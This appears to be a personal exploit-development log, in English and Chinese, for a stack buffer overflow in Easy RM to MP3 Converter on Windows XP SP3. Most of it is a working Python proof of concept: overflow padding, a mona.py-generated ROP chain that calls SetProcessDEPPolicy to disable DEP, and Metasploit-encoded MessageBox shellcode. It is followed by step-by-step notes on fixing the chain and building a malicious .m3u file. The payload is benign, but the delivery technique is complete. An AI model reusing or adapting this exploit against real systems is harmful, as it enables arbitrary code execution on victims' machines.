EasyRMtoMP3Converter.exe stack overflow bypass dep using rop tech

environment &tools

• os:windows xp sp3
• dep:Optout

• tools:immunity debugger with plugin mona.py

  usedAPI: SetProcessDEPPolicy MSDN

BOOL WINAPI SetProcessDEPPolicy(
  _In_  DWORD dwFlags              0x00 close dep for this process.
);

return value:1 true 0 false

POC(exp.py)

import struct

junk="A"*25000
junkb="A"*1067


################################################################################

##Register setup for SetProcessDEPPolicy() :
##--------------------------------------------
## EAX = <not used>
## ECX = <not used>
## EDX = <not used>
## EBX = dwFlags (ptr to 0x00000000)         #something wrong when creating rop. should be 0x00,not the &0x00
## ESP = ReturnTo (automatic)
## EBP = ptr to SetProcessDEPPolicy()
## ESI = <not used>
## EDI = ROP NOP (4 byte stackpivot)
##--------------------------------------------

def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x77c01498,  # POP EBP # RETN [msvcrt.dll]
      0x90909090,  #for balaance
      0x7c862144,  # SetProcessDEPPolicy() [kernel32.dll]
##      0x7c80dfdd,  # POP EBX # RETN [kernel32.dll] 
##      0x75ff0104,  # &0x00000000 [MSVCP60.dll]
         0x7c80dfdd,            #pop ebx,ret  kernel32.dll
          0xffffffff,
       0x770f9028   ,          #inc ebx,ret        oleaut32.dll
      0x766cbaec,  # POP EDI # RETN [WININET.dll] 
      0x766cbaec,  # skip 4 bytes [WININET.dll]
      0x77dcc5ee,  # PUSHAD # RETN [ADVAPI32.dll] 
    ]
    return ‘‘.join(struct.pack(‘<I‘, _) for _ in rop_gadgets)

rop_chain = create_rop_chain()
# windows/messagebox - 297 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process, 
# TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO

##generate -b ‘\x0a\x00\x0d‘ -t python

buf =  ""
buf += "\xbb\x44\xfb\x26\x2f\xda\xdb\xd9\x74\x24\xf4\x5d\x29"
buf += "\xc9\xb1\x44\x31\x5d\x14\x83\xed\xfc\x03\x5d\x10\xa6"
buf += "\x0e\xff\xc4\xbd\x28\x74\x3f\x35\xfb\xa7\x8d\xc2\xcd"
buf += "\x8e\x96\xa7\x5f\x21\xdc\xc1\x93\xca\x94\x31\x27\x8a"
buf += "\x50\xc2\x49\x33\xea\xe2\x8d\x7c\xf4\x7f\x1d\xdb\x05"
buf += "\xae\x1e\x3d\x65\xdb\x8d\x9a\x42\x50\x08\xdf\x01\x32"
buf += "\xbb\x67\x17\x50\x30\xdd\x0f\x2f\x1d\xc2\x2e\xc4\x41"
buf += "\x36\x78\x91\xb2\xbc\x7b\x4b\x8b\x3d\x4a\x53\x10\x6d"
buf += "\x29\x93\x9d\x69\xf3\xdc\x53\x77\x34\x09\x9f\x4c\xc6"
buf += "\xe9\x48\xc6\xd7\x7a\xd2\x0c\x19\x97\x85\xc7\x15\x2c"
buf += "\xc1\x82\x39\xb3\x3e\xb9\x46\x38\xc1\x56\xcf\x7a\xe6"
buf += "\xba\xb1\x41\x54\xca\x18\x91\x10\x2e\xd3\xdb\x4b\x3f"
buf += "\xaa\xd5\x67\x6d\xdb\x76\x88\x6d\xe4\x01\x32\x96\xa0"
buf += "\x6f\x65\x74\xa5\x08\x89\x5d\x18\xfe\x3c\x62\x63\x01"
buf += "\xc9\xd8\x94\x95\xa6\x8e\x84\x24\x5f\x7c\xf7\x88\xfb"
buf += "\xea\x82\xa7\x66\x99\xe4\x1b\x4d\x57\x7c\x45\xdb\x98"
buf += "\x2b\x8d\x6d\xa4\x84\x36\xc5\x8b\x68\xf4\x91\xd0\x56"
buf += "\x56\x76\x89\x69\xa9\x79\x22\xf9\x2d\xde\x93\x6d\xac"
buf += "\xb9\xb6\x2f\x46\x0b\x5c\xc3\xe5\xa2\x45\xab\x55\xe1"
buf += "\x73\x25\x86\x81\xdb\x15\x68\x72\xb4\x18\x3b\x34\x65"
buf += "\xcb\xc9\xd7\x08\x2b\x45\x47\xff\x0b\xf3\xff\xb7\x2e"
buf += "\x97\x93\x76\x78\xef\x20\x5d\x6a\x66\x59\xac\x58\x2a"
buf += "\xc9\x9e\x0e\x35\x3d\x11\x6f\x99\x41\x07\x67"

rop_chain = create_rop_chain()
shellcode =junk+junkb +rop_chain+buf


print shellcode

注意：

step1: In immunity debugger
!mona.py pattern_create 5000
!mona.py pattern_offset XXXX
获取偏移地址，精确覆盖。
还需要确定覆盖的函数返回地址用的是retn还是retn4，最终确定是retn4，构造rop链的时候就需要注意了。

step2：In immunity debugger
!mona.py rop -m *.dll -cp nonull
使用mona生成自动化rop链，地址中不包含空字符。
1G内存，在虚拟机中，花了我整整40分钟，没想到得到的结果细节上还是错的。
建议：将来使用的时候对某一个dll进行关键测试，剩下的自己补充，这样快一点。
错误：本此测试生成的rop链是错误的，因为没有考虑到dll的重定位问题，在测试的时候加上参数 -cm rebase即可解决。

step3：find the addr of some instruction （eg）
!mona asm -s ‘inc edx#ret’
返回指令的机器码
！mona find -s “机器码” -m aim.dll

step4:优化rop链

##Register setup for SetProcessDEPPolicy() :
##--------------------------------------------
## EAX = <not used>
## ECX = <not used>
## EDX = <not used>
## EBX = dwFlags (ptr to 0x00000000)         #something wrong when creating rop. should be 0x00,not the &0x00
## ESP = ReturnTo (automatic)
## EBP = ptr to SetProcessDEPPolicy()
## ESI = <not used>
## EDI = ROP NOP (4 byte stackpivot)
##--------------------------------------------

def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x77c01498,  # POP EBP # RETN [msvcrt.dll]
      0x90909090,  #for balaance
      0x7c862144,  # SetProcessDEPPolicy() [kernel32.dll]
##      0x7c80dfdd,  # POP EBX # RETN [kernel32.dll] 
##      0x75ff0104,  # &0x00000000 [MSVCP60.dll]
         0x7c80dfdd,            #pop ebx,ret  kernel32.dll
          0xffffffff,
       0x770f9028   ,          #inc ebx,ret        oleaut32.dll
      0x766cbaec,  # POP EDI # RETN [WININET.dll] 
      0x766cbaec,  # skip 4 bytes [WININET.dll]
      0x77dcc5ee,  # PUSHAD # RETN [ADVAPI32.dll] 
    ]
    return ‘‘.join(struct.pack(‘<I‘, _) for _ in rop_gadgets)

1. 首先在rop的第二项中填充了0x90909090，这是junkcode（垃圾代码），因为ret4(被覆盖的函数返回地址)后，esp会-8，而不是-4
2. 函数调用不对，使用的应该是ebx为0，而不是用ebx记录0的位置。所以改写成了pop ebx,ret inc ebx,ret
3. （不能写0，会被截断）。 体会pop ebi 和skip 4 bytes使用同一个地址的作用，非常有意思。体会pushad带来的好处。
4. 测试过程中如何测试，给rop第一条指令地址下断点，跟踪，紧跟esp变化，分析出来执行开始前的esp，不要跟错了。

show time

C:\Documents and Settings\Administrator\桌面>exp.py >crash.m3u

drag the file to the software.
PWN!!!!!!!